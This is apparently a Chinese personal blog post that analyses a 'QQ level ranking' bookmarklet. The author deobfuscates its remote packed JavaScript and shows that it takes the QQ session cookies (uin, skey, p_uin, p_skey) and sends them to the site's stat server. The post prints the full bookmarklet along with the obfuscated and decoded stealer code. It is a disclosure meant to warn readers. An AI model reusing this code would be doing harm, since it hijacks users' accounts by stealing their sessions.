打开qq的时候,鼠标晃到头像上去了,为什么还没有一个皇冠,如果当初的那个号不被盗,应该早就已经皇冠了,突然我想看看最高等级的qq是多少,遂打开百度,输入qq等级排行榜,打开了第一个。卧槽2个太阳,真厉害,转瞬我又想这数据咋拿到的?
屏幕中间有一个QQ上榜/更新资料,请点这里,点开,按照它写的方法,先得把下面这段代码添加到收藏夹
javascript:var v1='2.0';void((function(){var src='https://www.324324.cn/level/update.js?time='+(new Date()).getTime();var js=document.createElement('script');js.charset='utf-8';js.setAttribute('src',src);document.body.appendChild(js);})())
然后让你打开qq安全中心,在打开收藏夹的这个内容,它就采集好你的qq等级了。真棒!上面的代码相当于执行了一段js,在你qq安全中心的页面执行一段js,这意味着啥??,不行我得看看它到底干了啥?
打开看看https://www.324324.cn/level/update.js
是啥?
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('7 M=F.1K("M"),v=\'\',p=\'\',c=\'\',n=\'\',q=\'\';u 1u(){7 j,1l=T;17{j=G 2y("4I.2x")}14(e){17{j=G 2y("3m.2x")}14(e){17{j=G 3n()}14(e){j=T}}}m(!j)H V;2l.1m=u(1k,18,1t,28){m(!j)H T;1l=T;18=18.3k();17{m(18=="1v"){j.2z(18,1k+"?"+1t,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}1t=""}2G{j.2z(18,1k,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}j.2E("3l","3o "+1k+" 3r/1.1");j.2E("3s-3p","3q/x-C-3d-3e")}j.3b=u(){m(j.3c==4&&!1l){1l=1i;28(j.3f)}};j.3i(1t)}14(z){H T}H 1i};H 2l};u 2w(1R){7 r=\'\',c=\'\',l=3g(29.3h()*5+1);3t(7 i=0;i<1R.3F;i++){c=1R.3G(i);m(c>47&&c<3D){c+=i%l+l;m(c>3E)c-=10}m(c>3H&&c<3K){c+=i%l+l;m(c>3L)c-=26}r+=3I.3J(c)}H 1p(r)+l.3w(16)};u O(2f){7 1S=F.1y.3x(G 3u("(^| )"+2f+"=([^;]*)(;|$)"));m(1S!=V)H 3v(1S[2]);H V};u 2b(){7 L=\'1g://W.h.11/1E-1F/2b\';7 13=\'1v\';7 2J=\'r=\'+(G 1C().1B());7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];m(f.3B==0){v=O(\'v\');2o()}2G{2g(\'3C锛乗')}};7 15=G 1u();15.1m(L,13,2J,1a)};u 2d(){7 L=\'1g://W.h.11/1E-1F/3z\';7 19=\'3A=1&v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];7 h=q;7 1r=n;7 1V=p;7 1M=c;7 N=f.N;7 1O=f.2M;7 1P=f.2Q;7 1s=f.2N;7 1Y=f.2R;7 1W=f.2P;7 1X=f.2S;7 2i=f.2O;7 1s=29.35(1s,2i);7 1T=f.36.1q;7 1U=f.33.1q;7 1j=f.34;7 P=0;m(f.39>=3a)P+=1;m(f.1N.1q>=f.1N.37)P+=38(f.1N.1s);m(f.2V.1q>=10)P+=0.3;7 s=\'<b><A U=1d 1h=+2>2W 2I \'+h+\' 2T锛�</A></b><g>\';s+=\'<g>2U锛歕'+h;s+=\'<g>2Z锛歕'+1r;s+=\'<g>31锛歕'+p+c;s+=\'<g>2X锛歕'+N;s+=\'<g>2Y锛歕'+1j;s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4H锛�2q銆傘€傘€�</A></b></a>\';F.1K(\'s\').1J=s;7 1D=2w(v+\',\'+h+\',\'+N+\',\'+1j+\',\'+P);7 2p=\'w://C.B.D/y/1n.1f?1o=4L&h=\'+h+\'&1j=\'+1j+\'&P=\'+P+\'&1O=\'+1O+\'&1P=\'+1P+\'&1W=\'+1W+\'&1X=\'+1X+\'&1Y=\'+1Y+\'&1T=\'+1T+\'&1U=\'+1U+\'&1r=\'+1p(1r)+\'&1V=\'+1p(1V)+\'&1M=\'+1p(1M)+\'&v=\'+v+\'&1D=\'+1D;7 S=F.1Q(\'2c\');S.2L(\'1c\',2p);F.1z.2s(S)};7 15=G 1u();15.1m(L,13,19,1a)};u 2o(){7 L=\'1g://W.h.11/1E-1F/4v\';7 19=\'v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];p=f[\'4D\'];c=f[\'4t\'];n=f[\'n\'];2d()};7 15=G 1u();15.1m(L,13,19,1a)};u 4P(h){7 s=\'<b><A U=1d 1h=+2>2I \'+h+\' 2m锛�</A></b><g>\';s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4R锛�</A></b></a><g><g><b><A U=4Q 1h=+2>4J:2h~</A></b>\';F.1K(\'s\').1J=s;m(4K("2m锛�4O锛焅\r\\3Z:2h~"))y.2e.K=\'w://C.B.D/y/1n.1f?1o=1G&h=\'+h};u 2a(){M.k.2j="3Y"};(u 3X(){7 1H=T;7 45=\'2.0\';7 12=O("12");7 1b=O("1b");7 1x=O("1x");7 1w=O("1w");m(12==V||1b==V)1H=1i;m(1H){2g("3P锛孿\3Q-3O锛孿\3M\\"3N\\"锛孿\3U锛�");y.2e.K="w://W.h.11/3V.1I?3T=27#27";H}7 2A=\'<1Z J="24" 2C="0" X="R" 2D="0" 2H="0"><I><E J="3R" 2F="w://C.B.D/y/3S.1e" X=2B><22 1c="w://C.B.D/y/46.1e" J="4l" Q="30"></E><E J="5"><22 1c="w://C.B.D/y/4m.1e" J="5" Q="30"></E></I><I><E 2K="2" 2F="w://C.B.D/y/4k.1e" k="25-y:4i"><1Z J="4j%" 2C="0" X="R" 2D="0" 2H="0"><I><E X="R"><21 k="1L-X:R;J:4r;Q:4p;4n:4o;" W="s"><g/><g/>4b锛�2q銆傘€傘€�<g/><g/>4c锛�4a锛�<g/><g/>48锛�49锛�4g锛�<g/><g/><a K="1g://t.h.11/2n" Z="Y"><b><A U="1d">^0^4d锛�4e^0^</A></b></a></21></E></I><I X="R"><E Q="20"><a K="w://C.B.D/N/" Z="Y">4N</a>聽聽<a K="w://C.B.D/N/4y/" Z="Y">4F</a>聽聽<a K="1g://t.h.11/2n" Z="Y">4E</a>聽聽<a K="4x:2a()">4G</a></E></I><I><E 2K="2"><22 1c="w://C.B.D/y/3y.1e" J="24" Q="6"></E></I></1Z>\';7 d=(M==V?F.1Q(\'21\'):M);d.W="M";d.k.32="4u";d.k.25=\'2k\';d.k.4A=\'2k\';d.k.4B=\'4z(42=4q)\';d.k.4f=\'4h\';d.k.2B=2u+"23";d.k.y=2u+"23";d.k.J=\'41\';d.k.Q=\'43\';d.k.44=\'R\';d.k.3W=40;d.k.2j=\'4S\';d.k.4w="0.9";d.1J=2A;M=d;F.1z.4T(d,F.1z.4s);q=12.4C(/^o[0]*/,\'\');v=O("v");7 1y=4M("12="+12+"; 1b="+1b+"; 1x="+1x+"; 1w="+1w);7 L="w://3j.B.D/N.1f";7 19="1y="+1y+"&v="+v;7 S=F.1Q(\'2c\');S.2L(\'1c\',L+\'?\'+19);F.1z.2s(S)})();',62,304,'|||||||var||||||||json|br|qq||xmlhttp|style||if||||||info||function|ldw|https||top||font|324324|www|cn|td|document|new|return|tr|width|href|url|qbit|level|getCookie|base_day|height|center|js|false|color|null|id|align|_0|target||com|uin|method|catch|ajax||try|sMethod|vars|fdone|skey|src|red|gif|php|http|size|true|day|sURL|bComplete|connect|qq_list|action|encodeURIComponent|cur|nick|speed|sVars|Ajax|GET|p_skey|p_uin|cookie|body|eval|getTime|Date|hash|cgi|bin|show|jump|html|innerHTML|getElementById|text|city|visible|vip|year|createElement|str|arr|gj|mg|province|sql|sqy|svip|table||div|img|px|335|padding||mylevel|fnDone|Math|hidewin|get_base_key|script|get_qq_level|location|name|alert|绛変粖鏃ュ姞閫熶换鍔″叏閮ㄥ畬鎴愬悗鍐嶆潵涓婃浼氭洿鍑嗗摝|sqs|display|0px|this|涓婃鎴愬姛|q324324|get_user_info|update_url|璇风◢鍊檤overrideMimeType|appendChild|utf|200|charset|qbit_encode|XMLHTTP|ActiveXObject|open|win|left|border|cellpadding|setRequestHeader|background|else|cellspacing|QQ|data|colspan|setAttribute|QQVipLevel|QQVipSpeed|superQQSpeed|superQQLevel|QQVipYear|isSuperVip|superQQYear|鐨勭瓑绾ц祫鏂檤QQ鍙风爜|shouQ|浠ヤ笅鏄瘄QQ绛夌骇|娲昏穬澶╂暟|QQ鏄电О||鎵€鍦ㄥ湴鍖簗position|xiaochu|days|max|PCMgr|total|parseFloat|onlineTotalTimes|120|onreadystatechange|readyState|form|urlencoded|responseText|parseInt|random|send|stat|toUpperCase|Method|Microsoft|XMLHttpRequest|POST|Type|application|HTTP|Content|for|RegExp|decodeURI|toString|match|footer|qqlevel|page_type|ec|鏇存柊澶辫触|58|57|length|charCodeAt|96|String|fromCharCode|123|122|n璺宠浆瀹屽悗鍐嶆閫夋嫨鏀惰棌澶归噷鐨剕QQ绛夌骇鑷姩涓婃|鎴戠殑绛夌骇椤甸潰|褰撳墠椤甸潰鎵句笉鍒颁綘鐨凲Q绛夌骇淇℃伅|n鐐瑰嚮纭畾灏嗚烦杞埌QQ涓汉涓績|330|01bg|mod|n鍗冲彲瀹屾垚涓婃鎿嶄綔|index|zIndex|showwin|none|nPS|999998|335px|Opacity|280px|textAlign|v2|01||濡傛灉闀挎椂闂存病鏈夊弽鏄爘璇峰埛鏂伴〉闈鍚﹀垯鏃犳硶鑾峰彇璧勬枡|姝e湪鏌ヨ|璇风‘淇濅綘宸茬粡鐧诲綍浜嗘垜鐨凲Q涓績|濡傛灉瑙夊緱濂界敤|灏变粙缁嶇粰浣犵殑QQ濂藉弸鍚fontSize|閲嶆柊鎿嶄綔涓€娆14px|15px|85|03bg|250|02|overflow|auto|205px|90|300px|firstChild|pos_c_cn|absolute|userinfo|opacity|javascript|update|Alpha|margin|filter|replace|pos_p_cn|寰崥浜ゆ祦|甯姪鏇存柊|鍏抽棴绐楀彛|姝e湪涓婃|Msxml2|PS|confirm|add|escape|QQ绛夌骇鎺掕姒渱鏄惁椹笂鏌ョ湅浣犵殑QQ鍏ㄥ浗鎺掑悕|show_update_info|green|鐐瑰嚮杩欓噷鏌ョ湅浣犵殑QQ绛夌骇鍏ㄧ悆鎺掑悕|block|insertBefore'.split('|'),0,{}))
混淆的,我最喜欢解混淆了,一般来说,只要能运行的js都能解。最简单的解法直接放到chrome里面动态调就行了。
复制保存到本地,打开本地保存的js,发现报错了?,复制粘贴到console里面,可以直接运行,本地报错了,第一个想到字符集出错了,确实也是这样。
比如'!\''
,十六进制来看27 EF BC 81 5C 27 27
,utf8下这段字符串没有任何错误,本地保存的时候没有指定字符集,chrome 默认gbk,所以 81 5c
组合成了新的字符,后面的单引号逃出来了,所以报错了。所以需要指定一些字符集为utf8。 算一个小插曲。
在chrome里面下断刷新页面,没断到,遂在最前面加了一个debugger;
手动断一下。
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
}
;
if (!''.replace(/^/, String)) {
while (c--)
d[e(c)] = k[c] || e(c);
k = [function(e) {
return d[e]
}
];
e = function() {
return '\\w+'
}
;
c = 1;
}
;while (c--)
if (k[c])
p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
return p;
}('7 M=F.1K("M"),v=\'\',p=\'\',c=\'\',n=\'\',q=\'\';u 1u(){7 j,1l=T;17{j=G 2y("4I.2x")}14(e){17{j=G 2y("3m.2x")}14(e){17{j=G 3n()}14(e){j=T}}}m(!j)H V;2l.1m=u(1k,18,1t,28){m(!j)H T;1l=T;18=18.3k();17{m(18=="1v"){j.2z(18,1k+"?"+1t,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}1t=""}2G{j.2z(18,1k,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}j.2E("3l","3o "+1k+" 3r/1.1");j.2E("3s-3p","3q/x-C-3d-3e")}j.3b=u(){m(j.3c==4&&!1l){1l=1i;28(j.3f)}};j.3i(1t)}14(z){H T}H 1i};H 2l};u 2w(1R){7 r=\'\',c=\'\',l=3g(29.3h()*5+1);3t(7 i=0;i<1R.3F;i++){c=1R.3G(i);m(c>47&&c<3D){c+=i%l+l;m(c>3E)c-=10}m(c>3H&&c<3K){c+=i%l+l;m(c>3L)c-=26}r+=3I.3J(c)}H 1p(r)+l.3w(16)};u O(2f){7 1S=F.1y.3x(G 3u("(^| )"+2f+"=([^;]*)(;|$)"));m(1S!=V)H 3v(1S[2]);H V};u 2b(){7 L=\'1g://W.h.11/1E-1F/2b\';7 13=\'1v\';7 2J=\'r=\'+(G 1C().1B());7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];m(f.3B==0){v=O(\'v\');2o()}2G{2g(\'3C!\')}};7 15=G 1u();15.1m(L,13,2J,1a)};u 2d(){7 L=\'1g://W.h.11/1E-1F/3z\';7 19=\'3A=1&v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];7 h=q;7 1r=n;7 1V=p;7 1M=c;7 N=f.N;7 1O=f.2M;7 1P=f.2Q;7 1s=f.2N;7 1Y=f.2R;7 1W=f.2P;7 1X=f.2S;7 2i=f.2O;7 1s=29.35(1s,2i);7 1T=f.36.1q;7 1U=f.33.1q;7 1j=f.34;7 P=0;m(f.39>=3a)P+=1;m(f.1N.1q>=f.1N.37)P+=38(f.1N.1s);m(f.2V.1q>=10)P+=0.3;7 s=\'<b><A U=1d 1h=+2>2W 2I \'+h+\' 2T:</A></b><g>\';s+=\'<g>2U:\'+h;s+=\'<g>2Z:\'+1r;s+=\'<g>31:\'+p+c;s+=\'<g>2X:\'+N;s+=\'<g>2Y:\'+1j;s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4H,2q。。。</A></b></a>\';F.1K(\'s\').1J=s;7 1D=2w(v+\',\'+h+\',\'+N+\',\'+1j+\',\'+P);7 2p=\'w://C.B.D/y/1n.1f?1o=4L&h=\'+h+\'&1j=\'+1j+\'&P=\'+P+\'&1O=\'+1O+\'&1P=\'+1P+\'&1W=\'+1W+\'&1X=\'+1X+\'&1Y=\'+1Y+\'&1T=\'+1T+\'&1U=\'+1U+\'&1r=\'+1p(1r)+\'&1V=\'+1p(1V)+\'&1M=\'+1p(1M)+\'&v=\'+v+\'&1D=\'+1D;7 S=F.1Q(\'2c\');S.2L(\'1c\',2p);F.1z.2s(S)};7 15=G 1u();15.1m(L,13,19,1a)};u 2o(){7 L=\'1g://W.h.11/1E-1F/4v\';7 19=\'v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];p=f[\'4D\'];c=f[\'4t\'];n=f[\'n\'];2d()};7 15=G 1u();15.1m(L,13,19,1a)};u 4P(h){7 s=\'<b><A U=1d 1h=+2>2I \'+h+\' 2m!</A></b><g>\';s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4R!</A></b></a><g><g><b><A U=4Q 1h=+2>4J:2h~</A></b>\';F.1K(\'s\').1J=s;m(4K("2m,4O?\\r\\3Z:2h~"))y.2e.K=\'w://C.B.D/y/1n.1f?1o=1G&h=\'+h};u 2a(){M.k.2j="3Y"};(u 3X(){7 1H=T;7 45=\'2.0\';7 12=O("12");7 1b=O("1b");7 1x=O("1x");7 1w=O("1w");m(12==V||1b==V)1H=1i;m(1H){2g("3P,\\3Q-3O,\\3M\\"3N\\",\\3U!");y.2e.K="w://W.h.11/3V.1I?3T=27#27";H}7 2A=\'<1Z J="24" 2C="0" X="R" 2D="0" 2H="0"><I><E J="3R" 2F="w://C.B.D/y/3S.1e" X=2B><22 1c="w://C.B.D/y/46.1e" J="4l" Q="30"></E><E J="5"><22 1c="w://C.B.D/y/4m.1e" J="5" Q="30"></E></I><I><E 2K="2" 2F="w://C.B.D/y/4k.1e" k="25-y:4i"><1Z J="4j%" 2C="0" X="R" 2D="0" 2H="0"><I><E X="R"><21 k="1L-X:R;J:4r;Q:4p;4n:4o;" W="s"><g/><g/>4b,2q。。。<g/><g/>4c,4a!<g/><g/>48,49,4g!<g/><g/><a K="1g://t.h.11/2n" Z="Y"><b><A U="1d">^0^4d,4e^0^</A></b></a></21></E></I><I X="R"><E Q="20"><a K="w://C.B.D/N/" Z="Y">4N</a> <a K="w://C.B.D/N/4y/" Z="Y">4F</a> <a K="1g://t.h.11/2n" Z="Y">4E</a> <a K="4x:2a()">4G</a></E></I><I><E 2K="2"><22 1c="w://C.B.D/y/3y.1e" J="24" Q="6"></E></I></1Z>\';7 d=(M==V?F.1Q(\'21\'):M);d.W="M";d.k.32="4u";d.k.25=\'2k\';d.k.4A=\'2k\';d.k.4B=\'4z(42=4q)\';d.k.4f=\'4h\';d.k.2B=2u+"23";d.k.y=2u+"23";d.k.J=\'41\';d.k.Q=\'43\';d.k.44=\'R\';d.k.3W=40;d.k.2j=\'4S\';d.k.4w="0.9";d.1J=2A;M=d;F.1z.4T(d,F.1z.4s);q=12.4C(/^o[0]*/,\'\');v=O("v");7 1y=4M("12="+12+"; 1b="+1b+"; 1x="+1x+"; 1w="+1w);7 L="w://3j.B.D/N.1f";7 19="1y="+1y+"&v="+v;7 S=F.1Q(\'2c\');S.2L(\'1c\',L+\'?\'+19);F.1z.2s(S)})();', 62, 304, '|||||||var||||||||json|br|qq||xmlhttp|style||if||||||info||function|ldw|https||top||font|324324|www|cn|td|document|new|return|tr|width|href|url|qbit|level|getCookie|base_day|height|center|js|false|color|null|id|align|_0|target||com|uin|method|catch|ajax||try|sMethod|vars|fdone|skey|src|red|gif|php|http|size|true|day|sURL|bComplete|connect|qq_list|action|encodeURIComponent|cur|nick|speed|sVars|Ajax|GET|p_skey|p_uin|cookie|body|eval|getTime|Date|hash|cgi|bin|show|jump|html|innerHTML|getElementById|text|city|visible|vip|year|createElement|str|arr|gj|mg|province|sql|sqy|svip|table||div|img|px|335|padding||mylevel|fnDone|Math|hidewin|get_base_key|script|get_qq_level|location|name|alert|等今日加速任务全部完成后再来上榜会更准哦|sqs|display|0px|this|上榜成功|q324324|get_user_info|update_url|请稍候|overrideMimeType|appendChild|utf|200|charset|qbit_encode|XMLHTTP|ActiveXObject|open|win|left|border|cellpadding|setRequestHeader|background|else|cellspacing|QQ|data|colspan|setAttribute|QQVipLevel|QQVipSpeed|superQQSpeed|superQQLevel|QQVipYear|isSuperVip|superQQYear|的等级资料|QQ号码|shouQ|以下是|QQ等级|活跃天数|QQ昵称||所在地区|position|xiaochu|days|max|PCMgr|total|parseFloat|onlineTotalTimes|120|onreadystatechange|readyState|form|urlencoded|responseText|parseInt|random|send|stat|toUpperCase|Method|Microsoft|XMLHttpRequest|POST|Type|application|HTTP|Content|for|RegExp|decodeURI|toString|match|footer|qqlevel|page_type|ec|更新失败|58|57|length|charCodeAt|96|String|fromCharCode|123|122|n跳转完后再次选择收藏夹里的|QQ等级自动上榜|我的等级页面|当前页面找不到你的QQ等级信息|n点击确定将跳转到QQ个人中心|330|01bg|mod|n即可完成上榜操作|index|zIndex|showwin|none|nPS|999998|335px|Opacity|280px|textAlign|v2|01||如果长时间没有反映|请刷新页面|否则无法获取资料|正在查询|请确保你已经登录了我的QQ中心|如果觉得好用|就介绍给你的QQ好友吧|fontSize|重新操作一次|14px|15px|85|03bg|250|02|overflow|auto|205px|90|300px|firstChild|pos_c_cn|absolute|userinfo|opacity|javascript|update|Alpha|margin|filter|replace|pos_p_cn|微博交流|帮助更新|关闭窗口|正在上榜|Msxml2|PS|confirm|add|escape|QQ等级排行榜|是否马上查看你的QQ全国排名|show_update_info|green|点击这里查看你的QQ等级全球排名|block|insertBefore'.split('|'), 0, {}))
格式化一下好看一些,这其实就只是一个简单的压缩混淆,直接看eval里面那个匿名函数返回的是啥就行了,这个返回值必定是它需要执行的东西。return p
这里再下断。
得到p的值
var qbit = document.getElementById("qbit"),
ldw = '',
p = '',
c = '',
n = '',
q = '';
function Ajax() {
var xmlhttp, bComplete = false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
} catch(e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {
try {
xmlhttp = new XMLHttpRequest()
} catch(e) {
xmlhttp = false
}
}
}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone) {
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET") {
xmlhttp.open(sMethod, sURL + "?" + sVars, true);
try {
xmlhttp.overrideMimeType("text/html;charset=utf-8");
} catch(e) {}
sVars = ""
} else {
xmlhttp.open(sMethod, sURL, true);
try {
xmlhttp.overrideMimeType("text/html;charset=utf-8");
} catch(e) {}
xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && !bComplete) {
bComplete = true;
fnDone(xmlhttp.responseText)
}
};
xmlhttp.send(sVars)
} catch(z) {
return false
}
return true
};
return this
};
function qbit_encode(str) {
var r = '',
c = '',
l = parseInt(Math.random() * 5 + 1);
for (var i = 0; i < str.length; i++) {
c = str.charCodeAt(i);
if (c > 47 && c < 58) {
c += i % l + l;
if (c > 57) c -= 10
}
if (c > 96 && c < 123) {
c += i % l + l;
if (c > 122) c -= 26
}
r += String.fromCharCode(c)
}
return encodeURIComponent(r) + l.toString(16)
};
function getCookie(name) {
var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
if (arr != null) return decodeURI(arr[2]);
return null
};
function get_base_key() {
var url = 'http://id.qq.com/cgi-bin/get_base_key';
var method = 'GET';
var data = 'r=' + (new Date().getTime());
var fdone = function(json) {
json = eval('[' + json + ']');
json = json[0];
if (json.ec == 0) {
ldw = getCookie('ldw');
get_user_info()
} else {
alert('更新失败!')
}
};
var ajax = new Ajax();
ajax.connect(url, method, data, fdone)
};
function get_qq_level() {
var url = 'http://id.qq.com/cgi-bin/qqlevel';
var vars = 'page_type=1&ldw=' + ldw + '&r=' + new Date().getTime();
var method = "GET";
var fdone = function(json) {
json = eval('[' + json + ']');
json = json[0];
var qq = q;
var nick = n;
var province = p;
var city = c;
var level = json.level;
var vip = json.QQVipLevel;
var year = json.QQVipYear;
var speed = json.QQVipSpeed;
var svip = json.isSuperVip;
var sql = json.superQQLevel;
var sqy = json.superQQYear;
var sqs = json.superQQSpeed;
var speed = Math.max(speed, sqs);
var gj = json.PCMgr.cur;
var mg = json.xiaochu.cur;
var day = json.days;
var base_day = 0;
if (json.onlineTotalTimes >= 120) base_day += 1;
if (json.visible.cur >= json.visible.total) base_day += parseFloat(json.visible.speed);
if (json.shouQ.cur >= 10) base_day += 0.3;
var info = '<b><font color=red size=+2>以下是 QQ ' + qq + ' 的等级资料:</font></b><br>';
info += '<br>QQ号码:' + qq;
info += '<br>QQ昵称:' + nick;
info += '<br>所在地区:' + p + c;
info += '<br>QQ等级:' + level;
info += '<br>活跃天数:' + day;
info += '<br><br><a href="https://www.324324.cn/top/qq_list.php?action=show&qq=' + qq + '" target="_0"><b><font color=red size=+2>正在上榜,请稍候。。。</font></b></a>';
document.getElementById('info').innerHTML = info;
var hash = qbit_encode(ldw + ',' + qq + ',' + level + ',' + day + ',' + base_day);
var update_url = 'https://www.324324.cn/top/qq_list.php?action=add&qq=' + qq + '&day=' + day + '&base_day=' + base_day + '&vip=' + vip + '&year=' + year + '&sql=' + sql + '&sqy=' + sqy + '&svip=' + svip + '&gj=' + gj + '&mg=' + mg + '&nick=' + encodeURIComponent(nick) + '&province=' + encodeURIComponent(province) + '&city=' + encodeURIComponent(city) + '&ldw=' + ldw + '&hash=' + hash;
var js = document.createElement('script');
js.setAttribute('src', update_url);
document.body.appendChild(js)
};
var ajax = new Ajax();
ajax.connect(url, method, vars, fdone)
};
function get_user_info() {
var url = 'http://id.qq.com/cgi-bin/userinfo';
var vars = 'ldw=' + ldw + '&r=' + new Date().getTime();
var method = "GET";
var fdone = function(json) {
json = eval('[' + json + ']');
json = json[0];
p = json['pos_p_cn'];
c = json['pos_c_cn'];
n = json['n'];
get_qq_level()
};
var ajax = new Ajax();
ajax.connect(url, method, vars, fdone)
};
function show_update_info(qq) {
var info = '<b><font color=red size=+2>QQ ' + qq + ' 上榜成功!</font></b><br>';
info += '<br><br><a href="https://www.324324.cn/top/qq_list.php?action=show&qq=' + qq + '" target="_0"><b><font color=red size=+2>点击这里查看你的QQ等级全球排名!</font></b></a><br><br><b><font color=green size=+2>PS:等今日加速任务全部完成后再来上榜会更准哦~</font></b>';
document.getElementById('info').innerHTML = info;
if (confirm("上榜成功,是否马上查看你的QQ全国排名?\r\nPS:等今日加速任务全部完成后再来上榜会更准哦~")) top.location.href = 'https://www.324324.cn/top/qq_list.php?action=show&qq=' + qq
};
function hidewin() {
qbit.style.display = "none"
}; (function showwin() {
var jump = false;
var v2 = '2.0';
var uin = getCookie("uin");
var skey = getCookie("skey");
var p_uin = getCookie("p_uin");
var p_skey = getCookie("p_skey");
if (uin == null || skey == null) jump = true;
if (jump) {
alert("当前页面找不到你的QQ等级信息,\n点击确定将跳转到QQ个人中心-我的等级页面,\n跳转完后再次选择收藏夹里的\"QQ等级自动上榜\",\n即可完成上榜操作!");
top.location.href = "https://id.qq.com/index.html?mod=mylevel#mylevel";
return
}
var win = '<table width="335" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td width="330" background="https://www.324324.cn/top/01bg.gif" align=left><img src="https://www.324324.cn/top/01.gif" width="250" height="30"></td><td width="5"><img src="https://www.324324.cn/top/02.gif" width="5" height="30"></td></tr><tr><td colspan="2" background="https://www.324324.cn/top/03bg.gif" style="padding-top:15px"><table width="85%" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td align="center"><div style="text-align:center;width:300px;height:205px;overflow:auto;" id="info"><br/><br/>正在查询,请稍候。。。<br/><br/>请确保你已经登录了我的QQ中心,否则无法获取资料!<br/><br/>如果长时间没有反映,请刷新页面,重新操作一次!<br/><br/><a href="http://t.qq.com/q324324" target="_0"><b><font color="red">^0^如果觉得好用,就介绍给你的QQ好友吧^0^</font></b></a></div></td></tr><tr align="center"><td height="20"><a href="https://www.324324.cn/level/" target="_0">QQ等级排行榜</a> <a href="https://www.324324.cn/level/update/" target="_0">帮助更新</a> <a href="http://t.qq.com/q324324" target="_0">微博交流</a> <a href="javascript:hidewin()">关闭窗口</a></td></tr><tr><td colspan="2"><img src="https://www.324324.cn/top/footer.gif" width="335" height="6"></td></tr></table>';
var d = (qbit == null ? document.createElement('div') : qbit);
d.id = "qbit";
d.style.position = "absolute";
d.style.padding = '0px';
d.style.margin = '0px';
d.style.filter = 'Alpha(Opacity=90)';
d.style.fontSize = '14px';
d.style.left = 200 + "px";
d.style.top = 200 + "px";
d.style.width = '335px';
d.style.height = '280px';
d.style.textAlign = 'center';
d.style.zIndex = 999998;
d.style.display = 'block';
d.style.opacity = "0.9";
d.innerHTML = win;
qbit = d;
document.body.insertBefore(d, document.body.firstChild);
q = uin.replace(/^o[0]*/, '');
ldw = getCookie("ldw");
var cookie = escape("uin=" + uin + "; skey=" + skey + "; p_uin=" + p_uin + "; p_skey=" + p_skey);
var url = "https://stat.324324.cn/level.php";
var vars = "cookie=" + cookie + "&ldw=" + ldw;
var js = document.createElement('script');
js.setAttribute('src', url + '?' + vars);
document.body.appendChild(js)
})();
函数定义的部分直接略,直接看流程,看最后那个运行时函数,emmm,拿我cookie干嘛?,还往外发?emmmm,拿cookie参数加载了一个js,这个js的内容还是空的。所以采集信息就是拿这样吗?不知道有多少受害者。。。。。
一篇水文,大家笑笑就好,最近特别忙忙忙,一直也在研究新的东西,也没来及总结。算日常签到吧。:)